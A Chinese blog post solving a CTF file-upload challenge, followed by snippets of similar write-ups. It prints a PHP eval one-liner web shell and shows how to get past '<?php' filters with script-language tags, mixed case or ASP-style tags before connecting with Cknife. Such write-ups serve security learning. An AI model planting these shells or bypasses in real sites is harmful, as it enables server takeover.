10.28-“百度杯”CTF比赛 九月场-Web-upload

最新推荐文章于 2022-07-03 18:58:12 发布
最新推荐文章于 2022-07-03 18:58:12 发布
阅读量307 收藏
点赞数
分类专栏: CTF_1天1道
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43460822/article/details/102794268
版权

在这里插入图片描述
进入题目的页面,如图所示
在这里插入图片描述
根据提示,可以猜测此题用的是文件上传漏洞,通过上传一句话木门,然后用菜刀连接获取服务器控制,接着查看flag.php文件即可得到flag。
一句话木门如下:

<?php @eval($_POST['Cknife']);?>

发现可以上传成功,通过查看源代码可发现上传的位置,现在通过网址访问试试:
在这里插入图片描述
发现过滤了<?php,这是可以试试其他的php标记写法.如:

<script language="php"> @eval($_POST['Cknife']);</script>

访问一句话木门地址,发现似乎成功了。这是用Cknife来连接试试:
连接失败,但有提示:
在这里插入图片描述
原来把php给过滤了,试试大小写过滤。
成功绕过。
在这里插入图片描述

总结:
php标记的几种写法:

<? echo ("这是一个 PHP 语言的嵌入范例\n"); ?>
<?php echo("这是第二个 PHP 语言的嵌入范例\n"); ?>
<script language="php"> 
echo ("这是类似 JavaScript 及 VBScript 语法
的 PHP 语言嵌入范例");
</script>
<% echo ("这是类似 ASP 嵌入语法的 PHP 范例"); %>
<? ?>和<% %>的使用需要开启php.ini文件中的short_open_tag,不然会报错

在本题中,也可以用<% %>绕过。可自行尝试。

liuhandong-99
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百度CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 620
百度CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1772
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
百度CTF比赛 九月WebUpload
Pai_Space
07-03 128
百度CTF比赛 九月WebUpload
百度CTF比赛 九月 —— upload
吃肉唐僧的博客
09-07 295
打开题目,发现可以上传任意文件 构造一句话木马文件上传 居然上传成功,点开链接 发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容 换一种方式 <script language="pHp">@eval($_POST['sb'])</script> 上传,菜刀无链接 拿到flag ...
百度CTF比赛 九月 Code
feng的博客
09-11 586
前言 这道题基本上花了我差不多快5个小时,前面虽然遇到了小问题,但是自己也是努力攻克掉了,只是卡在了最后那块,看了很多WP,逻辑上花了很久很久才想明白。可以说,这题还是很不错的。 WP 打开环境发现是一张照片,第一反应是保存到本地然后用记事本打开看看里面藏没藏flag,我也这样试了,没用。我又进行了抓包和dirsearch扫描,其中dirsearch扫描有了一些收获: 我们发现了config.php文件,还有.idea的相关文件。我虽然不知道这是个什么文件,但是把那些都给打开看了一遍。在看/.idea/w
libltknet-sdk.10.28.0.zip
06-09
## [10.28.0] #### Application Compatibility | Library | Version | |-------------------|---------| |Octane .NET SDK | 2.28.0 | |Octane Java SDK | 1.28.0 | |.NET LTK | 10.28.0 | |Java LTK | 10.28.0 | |...
论文研究 - 纤锌矿氧化铍(w-BeO)的准确电子,输运及相关特性
06-01
通过在室温下使用a = 2.6979Å和c = 4.3772Å的实验晶格常数可以达到我们的10.30 eV的直接带隙,非常符合10.28 eV和10.3 eV的实验值。 根据我们计算的部分状态密度,高价带中O和Be p状态的杂交与相应的实验结果相符...
AlphaControls.v.10.28.D5-XE10.nSrc
04-13
AlphaControls v10.28 Stable released * Fixed error in the TsTrackBar component * Fixed error in destroying of TDBGridEH component in run-time * Improved work of the SkinData.CustomColor property * ...
论文研究 - MOFzyme:Fe / Fe-MIL-101的酶模拟物
05-21
本文采用水热法合成了金属有机骨架Fe-MIL-101,并制备了不同负载量的Fe / Fe-MIL-101。 Fe / Fe-MIL-101样品的晶体结构通过扫描电子... CuO NP(Km = 10.28 mM),表明对ABTS的亲和力比HRP和大多数过氧化物酶模拟物高。
百度CTF比赛 九月 考脑洞,你能过么?python3
weixin_42357645的博客
11-14 352
考脑洞,你能过么?python3 “百度CTF比赛 九月 Writeup 题解 0x01 changame.ichunqiu.com/index.php?jpg=hei.jpg 根据url格式就想试一下jpg=index.php 浏览器F12查看源码img标签似乎是base64 直接上python3代码 #ready import requests import re import base64 from time import sleep urlPart1='9fa9f9800df645d298a2
百度CTF比赛 九月 Web-Upload
qq_34106499的博客
01-14 498
1. php一句话木马编写及使用(长标签); 2. 上传文件绕过 ` <? ' , ' php ' 的方法; 3. 菜刀连接php一句话木马;
百度CTF比赛 九月 Upload
weixin_43858799的博客
05-19 550
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件来获取到flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
百度CTF比赛 九月——Web-Upload
大方子
08-06 1596
============================= 个人收获: 1.PHP标记的不同写法 2.PHP标记被过滤可以试试大小写 ==============================     不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片,索性就不传了,因为这题挺简单的。   题目开始是说让我们随便上传文件,那么我们找个一句话直接上传 &lt...
百度CTF比赛 九月------code
大方子
08-16 3076
============================= 个人收获: 1.phpstorm创建的文件会自动穿件idea,里面的workspace.xml会保存目录结构 2.URL文件包含要多注意   =============================   题目:   刚开始以为是隐写,保存到本地打开看没有什么奇怪的地方,打开源码也很正常 但是URL的连接引起我...
百度CTF比赛 九月------123
大方子
08-07 1759
==================================== 个人收获: 1.时常留意备份文件 2.文件读取漏洞 3.疑问最后一步的flag,如果加了.php双写无法绕过,只能是不加后缀的flaflagg才能绕过 ====================================   题目界面:   右键查看源码信息 出现   试了下密码为zhan...
BUUCTF-WEB-Upload[详细wp]
sGanYu
09-19 2496
关于文件上传的题目 首先上传一句话.php文件,结果显示not image <?php @eval($_REQUEST['password']);?> 猜测当我们上传文件的时候,被标识的文件类型被过滤,即尝试MiMe绕过 MiMe是什么:MIME由一串简单的字符串组成,初期标识了邮件e-mail的附件的类型,后来在html文件中可以使用content-type属性表示,描述了这个文件类型的。 MiMe常见的格式 AUDIO/WAV WAVE音频流媒体文件 ...
BUUCTF WEB Upload
qq_41696858的博客
08-30 306
这题和昨天的Upload1简直一模一样,甚至还简单点? 可以看看这一篇https://blog.csdn.net/qq_41696858/article/details/119986051?spm=1001.2014.3001.5501 同样的phtml过后缀过滤,同样的png过前端过滤,同样的蚁剑链接,唯一的区别是<?和图片格式过滤没做 参考视频链接:https://www.bilibili.com/video/BV1kq4y1K7wS ...
proxy_set_header X-Forwarded-Host $Server_name;
最新发布
06-02
这个变量会被替换为当前服务器块中定义的 `server_name` 值,例如 `10.28.8.1`。因此,`proxy_set_header X-Forwarded-Host $Server_name` 的作用是将当前服务器块的 `server_name` 值添加到转发的请求头中的 `X-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值